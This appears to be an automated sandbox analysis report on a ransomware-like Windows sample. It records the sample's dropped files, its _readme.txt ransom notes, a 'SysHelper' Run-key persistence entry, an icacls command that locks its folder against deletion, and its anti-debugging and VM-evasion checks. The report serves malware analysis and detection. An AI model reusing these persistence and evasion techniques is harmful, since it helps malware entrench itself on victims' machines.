Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 0_2_00482220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,

0_2_00482220

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_00498565 push ecx; ret	0_2_00498578
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 2_2_00498565 push ecx; ret	2_2_00498578
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 3_2_00E48565 push ecx; ret	3_2_00E48578
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E48565 push ecx; ret	4_2_00E48578

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\Local Settings\Temp\wctF86A.tmp.vapo (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\Local Settings\Temp\wct3D66.tmp.vapo (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Temp\wctF86A.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\Temp\wct3D66.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Jump to dropped file

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\_readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\$WinREAgent\_readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\$WinREAgent\Scratch\_readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	File created: C:\Users\user\_readme.txt	Jump to behavior

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 0_2_004F1920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,

0_2_004F1920

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Stalling execution: Execution stalls by calling Sleep			graph_3-41176
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Stalling execution: Execution stalls by calling Sleep			graph_2-41476

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 0_2_00471178 rdtsc

0_2_00471178

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 2_2_004F1920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,

2_2_004F1920

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,	0_2_0047E670
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,	2_2_0047E670
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,	3_2_00E2E670
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,	4_2_00E2E670

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Thread delayed: delay time: 1200000

Jump to behavior

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wctF86A.tmp.vapo (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wct3D66.tmp.vapo (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wctF86A.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wct3D66.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Evaded block: after key decision

Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_0-38847

Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

API coverage: 6.2 %

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe TID: 5924	Thread sleep time: -1200000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe TID: 2500	Thread sleep count: 167 > 30			Jump to behavior

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_00480160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	0_2_00480160
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_0047F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	0_2_0047F730
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_0047FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	0_2_0047FB98
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 2_2_0047F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	2_2_0047F730
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 2_2_00480160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	2_2_00480160
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 2_2_0047FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	2_2_0047FB98
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 3_2_00E2F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	3_2_00E2F730
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 3_2_00E30160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	3_2_00E30160
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 3_2_00E2FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	3_2_00E2FB98
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E30160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	4_2_00E30160
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E2F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	4_2_00E2F730
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E2FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	4_2_00E2FB98

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Thread delayed: delay time: 1200000

Jump to behavior

Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000000.00000002.1692451058.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000000.00000002.1692451058.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000000.00000002.1692451058.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000000.00000002.1692451058.0000000000913000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.0000000001355000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.0000000001354000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.0000000001354000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.00000000013D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	API call chain: ExitProcess graph end node			graph_0-38849
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 0_2_00471178 rdtsc

0_2_00471178

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 0_2_00494168 _memset,IsDebuggerPresent,

0_2_00494168

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 0_2_0049A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_0049A57A

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

2_2_004F1920

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

0_2_00482220

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 0_2_004978D5 GetProcessHeap,

0_2_004978D5

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_004A29EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004A29EC
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 0_2_004A29BB SetUnhandledExceptionFilter,	0_2_004A29BB
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 2_2_004A29EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_004A29EC
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 2_2_004A29BB SetUnhandledExceptionFilter,	2_2_004A29BB
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 3_2_00E529EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00E529EC
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 3_2_00E529BB SetUnhandledExceptionFilter,	3_2_00E529BB
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E529EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00E529EC
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: 4_2_00E529BB SetUnhandledExceptionFilter,	4_2_00E529BB

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Process created: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe "C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe" --Admin IsNotAutoStart IsNotTask

Jump to behavior

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 0_2_00471000 cpuid

0_2_00471000

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	0_2_004A8178
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_004B0116
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_004A82A2
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	0_2_004A834F
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	0_2_004A8423
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: EnumSystemLocalesW,	0_2_004A87C8
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: GetLocaleInfoW,	0_2_004A884E
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	0_2_004A7BB3
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: EnumSystemLocalesW,	0_2_004A7E27
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_2_004A7E83
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_2_004A7F00
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	0_2_004A7F83
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	2_2_004A8178
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_004B0116
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_004A82A2
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	2_2_004A834F
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	2_2_004A8423
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: EnumSystemLocalesW,	2_2_004A87C8
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: GetLocaleInfoW,	2_2_004A884E
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	2_2_004A7BB3
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: EnumSystemLocalesW,	2_2_004A7E27
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	2_2_004A7E83
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	2_2_004A7F00
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	2_2_004A7F83
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	3_2_00E58178
